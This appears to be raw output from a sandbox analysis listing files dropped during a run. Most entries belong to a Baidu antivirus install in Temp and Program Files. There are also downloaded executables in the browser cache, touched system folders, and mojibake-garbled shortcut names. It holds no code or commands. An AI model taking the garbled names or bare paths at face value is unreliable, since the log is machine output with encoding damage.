%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_7_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\KVCommonRes.rdb (3616 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_6_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWUpdateTip.dll (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GlobalPluginInfo.xml (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMNetMonSusPlugin.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp17.tmp (2013786 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\InstallCfg.xml (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDEnhanceBoost.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDPerflog.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAn.exe (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnBugRpt.exe (23936 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\blacksign.dat (852 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMStringUtils.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\GetSystemVer.dll (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOTraceConfig.xml (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GCCommunicate.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWDeepClean.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOGarbageConfig.xml (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hips_customer.xml (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMKVMainPlugin.dll (25776 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\bd0002.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\baiduan_number_new.ttf (784 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\NetService.ini (615 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMBase.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDLogicUtils.dll (15656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMRepMgr.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerPreScan.dat (1 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDKV.rdb (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BaiduAnBugRpt.exe (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\{F5E93978-539C-476B-9A7B-B6C32025A557}.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASoftmgr.exe (25824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysAccLiveStrategy.dat (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnUpdate.exe (34365 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GCCallbackBind.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOSilentCleanerConfig.dat (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMBase.dll (32128 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\BDDefense.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\systemfile.dat (6 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\drivers\BDMNetMon.sys (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\vatl.msi (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SORegCleanerConfig.dat (900 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsBugRpt.exe (3361 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_3_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Softmgr.rdb (690 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SmartTips.rdb (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\policy_baiduan.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsUpdate.exe (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\StartupDict.dat (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\policy.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\8500.dat (18424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMReport.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDDefense_x64.sys (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOCleanerTrayPlugin.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\directui license.txt (593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMProcessRunningTime.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\softmgr.ico (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDAFileHelper.exe (21216 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMAVEng.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDLogicUtils.dll (10136 bytes)
%Documents and Settings%\All Users\Desktop\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«.lnk (895 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDNetMisc.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\softmgr_remind.ico (12024 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\InstallCfg.xml (177 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_5_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_2_speed.png (15 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\placeholder_tmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMKVScanPlugin.dll (12088 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«.lnk (907 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0001.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOGarbageCleanerConfig.dat (12 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\hips_self_enc.xml (1 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMUpdate.rdb (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDConfig.dll (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\libeay32.dll (33391 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hipsClient.xml (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnSvc.exe (33295 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\HipsClient.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\libcurllicense.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\uninst.exe (51840 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDKitUtils.dll (7384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0001.sys (11144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\DriverManager.dll (8680 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\wverify.dat (15019 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\font_desc.f (873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOLiveAccStrategyMgr.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsBusiness.dll (9320 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SOManager.rdb (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SORegCleanerScript.dat (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDSWShellExt.dll (15168 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Mainpage.rdb (23936 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_1_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsUpdate.exe (1552 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch.7z (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMMsg.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMStringUtils.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDAVCache.dll (34186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMNetMonMgrDll.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMRepBase.dll (30344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\TrustAndIso.dll (14416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWParseDetect.dll (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\GetSupplyId.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0002.sys (19752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMWindowsLib.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PluginSetup.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\bdmantivirus\BDKitUtils.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysOptDict.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMLog.dll (1552 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_0_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SusPlugin.rdb (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerConfig.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\InstallHelper.dll (37368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_repairproperty.dat (2 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\dl.dll (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMNet.dll (33295 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\preliminary.db (23296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SYSCleaner.dll (32824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDSoftMgrModule.dll (1552 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«\ÃƒÂ¥Ã‚ÂÃ‚Â¸ÃƒÂ¨Ã‚Â½Ã‚Â½ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«.lnk (880 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\CommonRes.rdb (62035 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\duilib license.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSafePlugin.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GameNoDisturb.ini (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\804.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccServicePlugin.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDSWShellExt64.dll (20624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMToolBox.dll (18424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixer.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWAcc.exe (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsIU.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerXMLScript.dat (3 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\BDDefense.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMCommon.dll (10136 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMAVCached.dll (1425 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMTray.rdb (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMAVEng.dll (50840 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_class_filter.db (26688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\kav_compatible.dat (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMReport.dll (25672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_property.dat (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GCScriptBind.dll (32824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMDbSqlite.dll (19592 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\cache_config.dat (469 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\EnhanceBoost.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\ad.dll (38248 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Patcher.rdb (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\BDDefense_x64.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccTrayPlugin.dll (14184 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\BDArKit.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_extlist.dat (3 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMReport.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\color_desc.clr (213 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\policy.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduPrevUIn.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOHomePageCleanerConfig.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMPatcherPlugin.dll (39770 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\pluginUnit.dat (727 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMTray\TrayPlugin.rdb (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SYSAccMgrDll.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWHelper.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsCore.dll (30344 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SafePlugin.rdb (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerPreOptimizeXMLScript.dat (519 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHips.exe (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\ns19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWNetComm.dll (12088 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_9_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMScriptVM.dll (8184 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_8_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\blacksign.dat (1389 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMFrameWork.dll (21480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSusPlugin.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\ccesign.dat (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMTrayTipsPlugin.dll (23424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMMainFrame.dll (34773 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOPluginCleanerConfig.dat (441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\install_res.rdb (40702 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMConnect.dll (28288 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_4_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SysAccelerator.rdb (6584 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\bd0002.sys (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\bd0001.sys (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\bd0001.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\openssllicense.txt (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bddownloader.exe (41699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWManagerView.dll (37727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMAccount.dll (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bduf.dll (15168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSkin.dll (33263 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_minute_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOLiveAccDataMgr.dll (11048 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\KVMain.rdb (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\placeholder_tmp (11 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMTinyXml.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduPrevUIn.dll (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysRepLib.dat (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnSWPlugin.exe (784 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMFrameWork.dll (1425 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\bd0002.sys (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\TrustAndIso.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\app.ico (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMTinyXml.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMFrameWork.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\cache_config.dat (469 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOCleanerPlugin.dll (88648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerCheckItem.dat (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMNet.dll (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDALeakfixer.exe (27704 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SysFixer.rdb (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMUpdate.dll (14840 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\drivers\BDMWrench.sys (7192 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BaiduAnCache.rptc (1068 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\NetService.ini (1205 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDPerflog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SWCatalogDataItem.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMDownload.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\HotPlugins.xml (386 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMLog.dll (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMCloudEng.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSmartTip.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PluginConfig.db (62035 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerPreOptimizeConfig.dat (497 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMSetting.rdb (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDLogicUtils.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\skin_engine.dll (13584 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\systemfile.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMUserCenter.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDDriverFixer.dll (16368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\WebSafe.dll (33455 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsBugRpt.exe (19152 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\LOG (4 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs (96 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\902.dat (4 bytes)
%WinDir%\repair (4 bytes)
%Documents and Settings%\All Users\APPLICATION DATA (4 bytes)
%Program Files%\WIRESHARK (192 bytes)
%WinDir%\WinSxS (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (632 bytes)
%WinDir%\$hf_mig$ (96 bytes)
%WinDir%\WinSxS\Manifests (1444 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wireshark.txt (12074 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\LOG (4 bytes)
%WinDir%\Help (248 bytes)
%WinDir%\ime (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\LOG (4 bytes)
%WinDir%\Prefetch\NETSH.EXE-085CFFDE.pf (24 bytes)
%Documents and Settings%\All Users\Documents\My Music (4 bytes)
C:\$Directory (1388 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\BaiduSdCache.rptc (102 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319 (1440 bytes)
%WinDir%\Microsoft.NET\Framework\V2.0.50727 (1444 bytes)
%Program Files%\COMMON FILES (4 bytes)
%System%\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} (4 bytes)
%WinDir%\Prefetch\REGSVR32.EXE-25EEFE2F.pf (48 bytes)
%Documents and Settings%\%current user%\APPLICATION DATA (4 bytes)
%WinDir%\pchealth\helpctr (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\000003.log (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\G1023_s_70904[1].exe (1040 bytes)
%Program Files%\Adobe\Reader 9.0 (4 bytes)
%System%\wbem\Logs\wbemcore.log (576 bytes)
C:\totalcmd (4 bytes)
%System%\CatRoot2 (96 bytes)
%System%\wbem\Repository\FS\INDEX.BTR (608 bytes)
%Program Files%\Common Files\VMware\Drivers (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\LOG (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\G1023_s_70904.exe (17531 bytes)
%WinDir%\MICROSOFT.NET (4 bytes)
%Program Files%\Adobe\Reader 9.0\Reader (192 bytes)
%WinDir%\assembly (4 bytes)
%Documents and Settings%\Default User (56 bytes)
%System%\oobe (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\000003.log (4 bytes)
%Documents and Settings%\LocalService (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-LEFTL.tmp\setup.tmp (3779 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F1023_s_30803.exe (4443178 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\test[1].txt (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dlinstlit.txt (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\F1023_s_30803[1].exe (4700638 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
